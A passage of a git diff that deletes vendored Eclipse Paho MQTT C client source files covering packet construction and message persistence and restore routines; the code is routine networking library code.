-
-	packet.flags.all = 0;
-	packet.flags.bits.cleanstart = client->cleansession;
-	packet.flags.bits.will = (client->will) ? 1 : 0;
-	if (packet.flags.bits.will)
-	{
-		packet.flags.bits.willQoS = client->will->qos;
-		packet.flags.bits.willRetain = client->will->retained;
-	}
-
-	if (client->username)
-		packet.flags.bits.username = 1;
-	if (client->password)
-		packet.flags.bits.password = 1;
-
-	writeChar(&ptr, packet.flags.all);
-	writeInt(&ptr, client->keepAliveInterval);
-	writeUTF(&ptr, client->clientID);
-	if (client->will)
-	{
-		writeUTF(&ptr, client->will->topic);
-		writeData(&ptr, client->will->payload, client->will->payloadlen);
-	}
-	if (client->username)
-		writeUTF(&ptr, client->username);
-	if (client->password)
-		writeData(&ptr, client->password, client->passwordlen);
-
-	rc = MQTTPacket_send(&client->net, packet.header, buf, len, 1);
-	Log(LOG_PROTOCOL, 0, NULL, client->net.socket, client->clientID, client->cleansession, rc);
-exit:
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(buf);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create connack packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_connack(unsigned char aHeader, char* data, size_t datalen)
-{
-	Connack* pack = malloc(sizeof(Connack));
-	char* curdata = data;
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	pack->flags.all = readChar(&curdata);
-	pack->rc = readChar(&curdata);
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Send an MQTT PINGREQ packet down a socket.
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pingreq(networkHandles* net, const char* clientID)
-{
-	Header header;
-	int rc = 0;
-	size_t buflen = 0;
-
-	FUNC_ENTRY;
-	header.byte = 0;
-	header.bits.type = PINGREQ;
-	rc = MQTTPacket_send(net, header, NULL, buflen,0);
-	Log(LOG_PROTOCOL, 20, NULL, net->socket, clientID, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT subscribe packet down a socket.
- * @param topics list of topics
- * @param qoss list of corresponding QoSs
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_subscribe(List* topics, List* qoss, int msgid, int dup, networkHandles* net, const char* clientID)
-{
-	Header header;
-	char *data, *ptr;
-	int rc = -1;
-	ListElement *elem = NULL, *qosElem = NULL;
-	int datalen;
-
-	FUNC_ENTRY;
-	header.bits.type = SUBSCRIBE;
-	header.bits.dup = dup;
-	header.bits.qos = 1;
-	header.bits.retain = 0;
-
-	datalen = 2 + topics->count * 3; /* utf length + char qos == 3 */
-	while (ListNextElement(topics, &elem))
-		datalen += (int)strlen((char*)(elem->content));
-	ptr = data = malloc(datalen);
-
-	writeInt(&ptr, msgid);
-	elem = NULL;
-	while (ListNextElement(topics, &elem))
-	{
-		ListNextElement(qoss, &qosElem);
-		writeUTF(&ptr, (char*)(elem->content));
-		writeChar(&ptr, *(int*)(qosElem->content));
-	}
-	rc = MQTTPacket_send(net, header, data, datalen, 1);
-	Log(LOG_PROTOCOL, 22, NULL, net->socket, clientID, msgid, rc);
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(data);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create suback packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_suback(unsigned char aHeader, char* data, size_t datalen)
-{
-	Suback* pack = malloc(sizeof(Suback));
-	char* curdata = data;
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	pack->msgId = readInt(&curdata);
-	pack->qoss = ListInitialize();
-	while ((size_t)(curdata - data) < datalen)
-	{
-		int* newint;
-		newint = malloc(sizeof(int));
-		*newint = (int)readChar(&curdata);
-		ListAppend(pack->qoss, newint, sizeof(int));
-	}
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Send an MQTT unsubscribe packet down a socket.
- * @param topics list of topics
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_unsubscribe(List* topics, int msgid, int dup, networkHandles* net, const char* clientID)
-{
-	Header header;
-	char *data, *ptr;
-	int rc = -1;
-	ListElement *elem = NULL;
-	int datalen;
-
-	FUNC_ENTRY;
-	header.bits.type = UNSUBSCRIBE;
-	header.bits.dup = dup;
-	header.bits.qos = 1;
-	header.bits.retain = 0;
-
-	datalen = 2 + topics->count * 2; /* utf length == 2 */
-	while (ListNextElement(topics, &elem))
-		datalen += (int)strlen((char*)(elem->content));
-	ptr = data = malloc(datalen);
-
-	writeInt(&ptr, msgid);
-	elem = NULL;
-	while (ListNextElement(topics, &elem))
-		writeUTF(&ptr, (char*)(elem->content));
-	rc = MQTTPacket_send(net, header, data, datalen, 1);
-	Log(LOG_PROTOCOL, 25, NULL, net->socket, clientID, msgid, rc);
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(data);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.h b/thirdparty/paho.mqtt.c/src/MQTTPacketOut.h
deleted file mode 100644
index 700db77..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.h
+++ /dev/null
@@ -1,34 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *******************************************************************************/
-
-#if !defined(MQTTPACKETOUT_H)
-#define MQTTPACKETOUT_H
-
-#include "MQTTPacket.h"
-
-int MQTTPacket_send_connect(Clients* client, int MQTTVersion);
-void* MQTTPacket_connack(unsigned char aHeader, char* data, size_t datalen);
-
-int MQTTPacket_send_pingreq(networkHandles* net, const char* clientID);
-
-int MQTTPacket_send_subscribe(List* topics, List* qoss, int msgid, int dup, networkHandles* net, const char* clientID);
-void* MQTTPacket_suback(unsigned char aHeader, char* data, size_t datalen);
-
-int MQTTPacket_send_unsubscribe(List* topics, int msgid, int dup, networkHandles* net, const char* clientID);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistence.c b/thirdparty/paho.mqtt.c/src/MQTTPersistence.c
deleted file mode 100644
index 24efb6d..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistence.c
+++ /dev/null
@@ -1,654 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *******************************************************************************/
-
-/**
- * @file
- * \brief Functions that apply to persistence operations.
- *
- */
-
-#include <stdio.h>
-#include <string.h>
-
-#include "MQTTPersistence.h"
-#include "MQTTPersistenceDefault.h"
-#include "MQTTProtocolClient.h"
-#include "Heap.h"
-
-
-static MQTTPersistence_qEntry* MQTTPersistence_restoreQueueEntry(char* buffer, size_t buflen);
-static void MQTTPersistence_insertInSeqOrder(List* list, MQTTPersistence_qEntry* qEntry, size_t size);
-
-/**
- * Creates a ::MQTTClient_persistence structure representing a persistence implementation.
- * @param persistence the ::MQTTClient_persistence structure.
- * @param type the type of the persistence implementation. See ::MQTTClient_create.
- * @param pcontext the context for this persistence implementation. See ::MQTTClient_create.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-#include "StackTrace.h"
-
-int MQTTPersistence_create(MQTTClient_persistence** persistence, int type, void* pcontext)
-{
-	int rc = 0;
-	MQTTClient_persistence* per = NULL;
-
-	FUNC_ENTRY;
-#if !defined(NO_PERSISTENCE)
-	switch (type)
-	{
-		case MQTTCLIENT_PERSISTENCE_NONE :
-			per = NULL;
-			break;
-		case MQTTCLIENT_PERSISTENCE_DEFAULT :
-			per = malloc(sizeof(MQTTClient_persistence));
-			if ( per != NULL )
-			{
-				if ( pcontext != NULL )
-				{
-					per->context = malloc(strlen(pcontext) + 1);
-					strcpy(per->context, pcontext);
-				}
-				else
-					per->context = ".";  /* working directory */
-				/* file system functions */
-				per->popen        = pstopen;
-				per->pclose       = pstclose;
-				per->pput         = pstput;
-				per->pget         = pstget;
-				per->premove      = pstremove;
-				per->pkeys        = pstkeys;
-				per->pclear       = pstclear;
-				per->pcontainskey = pstcontainskey;
-			}
-			else
-				rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			break;
-		case MQTTCLIENT_PERSISTENCE_USER :
-			per = (MQTTClient_persistence *)pcontext;
-			if ( per == NULL || (per != NULL && (per->context == NULL || per->pclear == NULL ||
-				per->pclose == NULL || per->pcontainskey == NULL || per->pget == NULL || per->pkeys == NULL ||
-				per->popen == NULL || per->pput == NULL || per->premove == NULL)) )
-				rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			break;
-		default:
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			break;
-	}
-#endif
-
-	*persistence = per;
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Open persistent store and restore any persisted messages.
- * @param client the client as ::Clients.
- * @param serverURI the URI of the remote end.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_initialize(Clients *c, const char *serverURI)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if ( c->persistence != NULL )
-	{
-		rc = c->persistence->popen(&(c->phandle), c->clientID, serverURI, c->persistence->context);
-		if ( rc == 0 )
-			rc = MQTTPersistence_restore(c);
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Close persistent store.
- * @param client the client as ::Clients.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_close(Clients *c)
-{
-	int rc =0;
-
-	FUNC_ENTRY;
-	if (c->persistence != NULL)
-	{
-		rc = c->persistence->pclose(c->phandle);
-		c->phandle = NULL;
-#if !defined(NO_PERSISTENCE)
-		if ( c->persistence->popen == pstopen )
-			free(c->persistence);
-#endif
-		c->persistence = NULL;
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/**
- * Clears the persistent store.
- * @param client the client as ::Clients.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_clear(Clients *c)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence != NULL)
-		rc = c->persistence->pclear(c->phandle);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Restores the persisted records to the outbound and inbound message queues of the
- * client.
- * @param client the client as ::Clients.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_restore(Clients *c)
-{
-	int rc = 0;
-	char **msgkeys = NULL,
-		 *buffer = NULL;
-	int nkeys, buflen;
-	int i = 0;
-	int msgs_sent = 0;
-	int msgs_rcvd = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence && (rc = c->persistence->pkeys(c->phandle, &msgkeys, &nkeys)) == 0)
-	{
-		while (rc == 0 && i < nkeys)
-		{
-			if (strncmp(msgkeys[i], PERSISTENCE_COMMAND_KEY, strlen(PERSISTENCE_COMMAND_KEY)) == 0)
-			{
-				;
-			}
-			else if (strncmp(msgkeys[i], PERSISTENCE_QUEUE_KEY, strlen(PERSISTENCE_QUEUE_KEY)) == 0)
-			{
-				;
-			}
-			else if ((rc = c->persistence->pget(c->phandle, msgkeys[i], &buffer, &buflen)) == 0)
-			{
-				MQTTPacket* pack = MQTTPersistence_restorePacket(buffer, buflen);
-				if ( pack != NULL )
-				{
-					if ( strstr(msgkeys[i],PERSISTENCE_PUBLISH_RECEIVED) != NULL )
-					{
-						Publish* publish = (Publish*)pack;
-						Messages* msg = NULL;
-						msg = MQTTProtocol_createMessage(publish, &msg, publish->header.bits.qos, publish->header.bits.retain);
-						msg->nextMessageType = PUBREL;
-						/* order does not matter for persisted received messages */
-						ListAppend(c->inboundMsgs, msg, msg->len);
-						publish->topic = NULL;
-						MQTTPacket_freePublish(publish);
-						msgs_rcvd++;
-					}
-					else if ( strstr(msgkeys[i],PERSISTENCE_PUBLISH_SENT) != NULL )
-					{
-						Publish* publish = (Publish*)pack;
-						Messages* msg = NULL;
-						char *key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-						sprintf(key, "%s%d", PERSISTENCE_PUBREL, publish->msgId);
-						msg = MQTTProtocol_createMessage(publish, &msg, publish->header.bits.qos, publish->header.bits.retain);
-						if ( c->persistence->pcontainskey(c->phandle, key) == 0 )
-							/* PUBLISH Qo2 and PUBREL sent */
-							msg->nextMessageType = PUBCOMP;
-						/* else: PUBLISH QoS1, or PUBLISH QoS2 and PUBREL not sent */
-						/* retry at the first opportunity */
-						msg->lastTouch = 0;
-						MQTTPersistence_insertInOrder(c->outboundMsgs, msg, msg->len);
-						publish->topic = NULL;
-						MQTTPacket_freePublish(publish);
-						free(key);
-						msgs_sent++;
-					}
-					else if ( strstr(msgkeys[i],PERSISTENCE_PUBREL) != NULL )
-					{
-						/* orphaned PUBRELs ? */
-						Pubrel* pubrel = (Pubrel*)pack;
-						char *key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-						sprintf(key, "%s%d", PERSISTENCE_PUBLISH_SENT, pubrel->msgId);
-						if ( c->persistence->pcontainskey(c->phandle, key) != 0 )
-							rc = c->persistence->premove(c->phandle, msgkeys[i]);
-						free(pubrel);
-						free(key);
-					}
-				}
-				else  /* pack == NULL -> bad persisted record */
-					rc = c->persistence->premove(c->phandle, msgkeys[i]);
-			}
-			if (buffer)
-			{
-				free(buffer);
-				buffer = NULL;
-			}
-			if (msgkeys[i])
-				free(msgkeys[i]);
-			i++;
-		}
-		if (msgkeys)
-			free(msgkeys);
-	}
-	Log(TRACE_MINIMUM, -1, "%d sent messages and %d received messages restored for client %s\n", 
-		msgs_sent, msgs_rcvd, c->clientID);
-	MQTTPersistence_wrapMsgID(c);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Returns a MQTT packet restored from persisted data.
- * @param buffer the persisted data.
- * @param buflen the number of bytes of the data buffer.
- */
-void* MQTTPersistence_restorePacket(char* buffer, size_t buflen)
-{
-	void* pack = NULL;
-	Header header;
-	int fixed_header_length = 1, ptype, remaining_length = 0;
-	char c;
-	int multiplier = 1;
-	extern pf new_packets[];
-
-	FUNC_ENTRY;
-	header.byte = buffer[0];
-	/* decode the message length according to the MQTT algorithm */
-	do
-	{
-		c = *(++buffer);
-		remaining_length += (c & 127) * multiplier;
-		multiplier *= 128;
-		fixed_header_length++;
-	} while ((c & 128) != 0);
-
-	if ( (fixed_header_length + remaining_length) == buflen )
-	{
-		ptype = header.bits.type;
-		if (ptype >= CONNECT && ptype <= DISCONNECT && new_packets[ptype] != NULL)
-			pack = (*new_packets[ptype])(header.byte, ++buffer, remaining_length);
-	}
-
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Inserts the specified message into the list, maintaining message ID order.
- * @param list the list to insert the message into.
- * @param content the message to add.
- * @param size size of the message.
- */
-void MQTTPersistence_insertInOrder(List* list, void* content, size_t size)
-{
-	ListElement* index = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while(ListNextElement(list, &current) != NULL && index == NULL)
-	{
-		if ( ((Messages*)content)->msgid < ((Messages*)current->content)->msgid )
-			index = current;
-	}
-
-	ListInsert(list, content, size, index);
-	FUNC_EXIT;
-}
-
-
-/**
- * Adds a record to the persistent store. This function must not be called for QoS0
- * messages.
- * @param socket the socket of the client.
- * @param buf0 fixed header.
- * @param buf0len length of the fixed header.
- * @param count number of buffers representing the variable header and/or the payload.
- * @param buffers the buffers representing the variable header and/or the payload.
- * @param buflens length of the buffers representing the variable header and/or the payload.
- * @param msgId the message ID.
- * @param scr 0 indicates message in the sending direction; 1 indicates message in the
- * receiving direction.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_put(int socket, char* buf0, size_t buf0len, int count,
-								 char** buffers, size_t* buflens, int htype, int msgId, int scr )
-{
-	int rc = 0;
-	extern ClientStates* bstate;
-	int nbufs, i;
-	int* lens = NULL;
-	char** bufs = NULL;
-	char *key;
-	Clients* client = NULL;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &socket, clientSocketCompare)->content);
-	if (client->persistence != NULL)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		nbufs = 1 + count;
-		lens = (int *)malloc(nbufs * sizeof(int));
-		bufs = (char **)malloc(nbufs * sizeof(char *));
-		lens[0] = (int)buf0len;
-		bufs[0] = buf0;
-		for (i = 0; i < count; i++)
-		{
-			lens[i+1] = (int)buflens[i];
-			bufs[i+1] = buffers[i];
-		}
-
-		/* key */
-		if ( scr == 0 )
-		{  /* sending */
-			if (htype == PUBLISH)   /* PUBLISH QoS1 and QoS2*/
-				sprintf(key, "%s%d", PERSISTENCE_PUBLISH_SENT, msgId);
-			if (htype == PUBREL)  /* PUBREL */
-				sprintf(key, "%s%d", PERSISTENCE_PUBREL, msgId);
-		}
-		if ( scr == 1 )  /* receiving PUBLISH QoS2 */
-			sprintf(key, "%s%d", PERSISTENCE_PUBLISH_RECEIVED, msgId);
-
-		rc = client->persistence->pput(client->phandle, key, nbufs, bufs, lens);
-
-		free(key);
-		free(lens);
-		free(bufs);
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Deletes a record from the persistent store.
- * @param client the client as ::Clients.
- * @param type the type of the persisted record: #PERSISTENCE_PUBLISH_SENT, #PERSISTENCE_PUBREL
- * or #PERSISTENCE_PUBLISH_RECEIVED.
- * @param qos the qos field of the message.
- * @param msgId the message ID.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_remove(Clients* c, char *type, int qos, int msgId)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence != NULL)
-	{
-		char *key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		if ( (strcmp(type,PERSISTENCE_PUBLISH_SENT) == 0) && qos == 2 )
-		{
-			sprintf(key, "%s%d", PERSISTENCE_PUBLISH_SENT, msgId) ;
-			rc = c->persistence->premove(c->phandle, key);
-			sprintf(key, "%s%d", PERSISTENCE_PUBREL, msgId) ;
-			rc = c->persistence->premove(c->phandle, key);
-		}
-		else /* PERSISTENCE_PUBLISH_SENT && qos == 1 */
-		{    /* or PERSISTENCE_PUBLISH_RECEIVED */
-			sprintf(key, "%s%d", type, msgId) ;
-			rc = c->persistence->premove(c->phandle, key);
-		}
-		free(key);
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Checks whether the message IDs wrapped by looking for the largest gap between two consecutive
- * message IDs in the outboundMsgs queue.
- * @param client the client as ::Clients.
- */
-void MQTTPersistence_wrapMsgID(Clients *client)
-{
-	ListElement* wrapel = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	if ( client->outboundMsgs->count > 0 )
-	{
-		int firstMsgID = ((Messages*)client->outboundMsgs->first->content)->msgid;
-		int lastMsgID = ((Messages*)client->outboundMsgs->last->content)->msgid;
-		int gap = MAX_MSG_ID - lastMsgID + firstMsgID;
-		current = ListNextElement(client->outboundMsgs, &current);
-
-		while(ListNextElement(client->outboundMsgs, &current) != NULL)
-		{
-			int curMsgID = ((Messages*)current->content)->msgid;
-			int curPrevMsgID = ((Messages*)current->prev->content)->msgid;
-			int curgap = curMsgID - curPrevMsgID;
-			if ( curgap > gap )
-			{
-				gap = curgap;
-				wrapel = current;
-			}
-		}
-	}
-
-	if ( wrapel != NULL )
-	{
-		/* put wrapel at the beginning of the queue */
-		client->outboundMsgs->first->prev = client->outboundMsgs->last;
-		client->outboundMsgs->last->next = client->outboundMsgs->first;
-		client->outboundMsgs->first = wrapel;
-		client->outboundMsgs->last = wrapel->prev;
-		client->outboundMsgs->first->prev = NULL;
-		client->outboundMsgs->last->next = NULL;
-	}
-	FUNC_EXIT;
-}
-
-
-#if !defined(NO_PERSISTENCE)
-int MQTTPersistence_unpersistQueueEntry(Clients* client, MQTTPersistence_qEntry* qe)
-{
-	int rc = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-	
-	FUNC_ENTRY;
-	sprintf(key, "%s%u", PERSISTENCE_QUEUE_KEY, qe->seqno);
-	if ((rc = client->persistence->premove(client->phandle, key)) != 0)
-		Log(LOG_ERROR, 0, "Error %d removing qEntry from persistence", rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTPersistence_persistQueueEntry(Clients* aclient, MQTTPersistence_qEntry* qe)
-{
-	int rc = 0;
-	int nbufs = 8;
-	int bufindex = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-	int* lens = NULL;
-	void** bufs = NULL;
-		
-	FUNC_ENTRY;
-	lens = (int*)malloc(nbufs * sizeof(int));
-	bufs = malloc(nbufs * sizeof(char *));
-						
-	bufs[bufindex] = &qe->msg->payloadlen;
-	lens[bufindex++] = sizeof(qe->msg->payloadlen);
-				
-	bufs[bufindex] = qe->msg->payload;
-	lens[bufindex++] = qe->msg->payloadlen;
-		
-	bufs[bufindex] = &qe->msg->qos;
-	lens[bufindex++] = sizeof(qe->msg->qos);
-		
-	bufs[bufindex] = &qe->msg->retained;
-	lens[bufindex++] = sizeof(qe->msg->retained);
-		
-	bufs[bufindex] = &qe->msg->dup;
-	lens[bufindex++] = sizeof(qe->msg->dup);
-				
-	bufs[bufindex] = &qe->msg->msgid;
-	lens[bufindex++] = sizeof(qe->msg->msgid);
-						
-	bufs[bufindex] = qe->topicName;
-	lens[bufindex++] = (int)strlen(qe->topicName) + 1;
-				
-	bufs[bufindex] = &qe->topicLen;
-	lens[bufindex++] = sizeof(qe->topicLen);			
-		
-	sprintf(key, "%s%d", PERSISTENCE_QUEUE_KEY, ++aclient->qentry_seqno);	
-	qe->seqno = aclient->qentry_seqno;
-
-	if ((rc = aclient->persistence->pput(aclient->phandle, key, nbufs, (char**)bufs, lens)) != 0)
-		Log(LOG_ERROR, 0, "Error persisting queue entry, rc %d", rc);
-
-	free(lens);
-	free(bufs);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static MQTTPersistence_qEntry* MQTTPersistence_restoreQueueEntry(char* buffer, size_t buflen)
-{
-	MQTTPersistence_qEntry* qe = NULL;
-	char* ptr = buffer;
-	int data_size;
-	
-	FUNC_ENTRY;
-	qe = malloc(sizeof(MQTTPersistence_qEntry));
-	memset(qe, '\0', sizeof(MQTTPersistence_qEntry));
-	
-	qe->msg = malloc(sizeof(MQTTPersistence_message));
-	memset(qe->msg, '\0', sizeof(MQTTPersistence_message));
-	
-	qe->msg->payloadlen = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	data_size = qe->msg->payloadlen;
-	qe->msg->payload = malloc(data_size);
-	memcpy(qe->msg->payload, ptr, data_size);
-	ptr += data_size;
-	
-	qe->msg->qos = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	qe->msg->retained = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	qe->msg->dup = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	qe->msg->msgid = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	data_size = (int)strlen(ptr) + 1;	
-	qe->topicName = malloc(data_size);
-	strcpy(qe->topicName, ptr);
-	ptr += data_size;
-	
-	qe->topicLen = *(int*)ptr;
-	ptr += sizeof(int);
-
-	FUNC_EXIT;
-	return qe;
-}
-
-
-static void MQTTPersistence_insertInSeqOrder(List* list, MQTTPersistence_qEntry* qEntry, size_t size)
-{
-	ListElement* index = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while (ListNextElement(list, &current) != NULL && index == NULL)
-	{
-		if (qEntry->seqno < ((MQTTPersistence_qEntry*)current->content)->seqno)
-			index = current;
-	}
-	ListInsert(list, qEntry, size, index);
-	FUNC_EXIT;
-}
-
-
-/**
- * Restores a queue of messages from persistence to memory
- * @param c the client as ::Clients - the client object to restore the messages to
- * @return return code, 0 if successful
- */
-int MQTTPersistence_restoreMessageQueue(Clients* c)
-{
-	int rc = 0;
-	char **msgkeys;
-	int nkeys;
-	int i = 0;
-	int entries_restored = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence && (rc = c->persistence->pkeys(c->phandle, &msgkeys, &nkeys)) == 0)
-	{
-		while (rc == 0 && i < nkeys)
-		{
-			char *buffer = NULL;
-			int buflen;
-					
-			if (strncmp(msgkeys[i], PERSISTENCE_QUEUE_KEY, strlen(PERSISTENCE_QUEUE_KEY)) != 0)
-			{
-				;
-			}
-			else if ((rc = c->persistence->pget(c->phandle, msgkeys[i], &buffer, &buflen)) == 0)
-			{
-				MQTTPersistence_qEntry* qe = MQTTPersistence_restoreQueueEntry(buffer, buflen);
-				
-				if (qe)
-				{	
-					qe->seqno = atoi(msgkeys[i]+2);
-					MQTTPersistence_insertInSeqOrder(c->messageQueue, qe, sizeof(MQTTPersistence_qEntry));
-					free(buffer);
-					c->qentry_seqno = max(c->qentry_seqno, qe->seqno);
-					entries_restored++;
-				}
-			}
-			if (msgkeys[i])
-			{
-				free(msgkeys[i]);
-			}
-			i++;
-		}
-		if (msgkeys != NULL)
-			free(msgkeys);
-	}
-	Log(TRACE_MINIMUM, -1, "%d queued messages restored for client %s", entries_restored, c->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistence.h b/thirdparty/paho.mqtt.c/src/MQTTPersistence.h
deleted file mode 100644
index 9a938ba..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistence.h
+++ /dev/null
@@ -1,74 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *******************************************************************************/
-
-#if defined(__cplusplus)
- extern "C" {
-#endif
-
-#include "Clients.h"
-
-/** Stem of the key for a sent PUBLISH QoS1 or QoS2 */
-#define PERSISTENCE_PUBLISH_SENT "s-"
-/** Stem of the key for a sent PUBREL */
-#define PERSISTENCE_PUBREL "sc-"
-/** Stem of the key for a received PUBLISH QoS2 */
-#define PERSISTENCE_PUBLISH_RECEIVED "r-"
-/** Stem of the key for an async client command */
-#define PERSISTENCE_COMMAND_KEY "c-"
-/** Stem of the key for an async client message queue */
-#define PERSISTENCE_QUEUE_KEY "q-"
-#define PERSISTENCE_MAX_KEY_LENGTH 8
-
-int MQTTPersistence_create(MQTTClient_persistence** per, int type, void* pcontext);
-int MQTTPersistence_initialize(Clients* c, const char* serverURI);
-int MQTTPersistence_close(Clients* c);
-int MQTTPersistence_clear(Clients* c);
-int MQTTPersistence_restore(Clients* c);
-void* MQTTPersistence_restorePacket(char* buffer, size_t buflen);
-void MQTTPersistence_insertInOrder(List* list, void* content, size_t size);
-int MQTTPersistence_put(int socket, char* buf0, size_t buf0len, int count, 
-								 char** buffers, size_t* buflens, int htype, int msgId, int scr);
-int MQTTPersistence_remove(Clients* c, char* type, int qos, int msgId);
-void MQTTPersistence_wrapMsgID(Clients *c);
-
-typedef struct
-{
-	char struct_id[4];
-	int struct_version;
-	int payloadlen;
-	void* payload;
-	int qos;
-	int retained;
-	int dup;
-	int msgid;
-} MQTTPersistence_message;
-
-typedef struct
-{
-	MQTTPersistence_message* msg;
-	char* topicName;
-	int topicLen;
-	unsigned int seqno; /* only used on restore */
-} MQTTPersistence_qEntry;
-
-int MQTTPersistence_unpersistQueueEntry(Clients* client, MQTTPersistence_qEntry* qe);
-int MQTTPersistence_persistQueueEntry(Clients* aclient, MQTTPersistence_qEntry* qe);
-int MQTTPersistence_restoreMessageQueue(Clients* c);
-#ifdef __cplusplus
-     }
-#endif
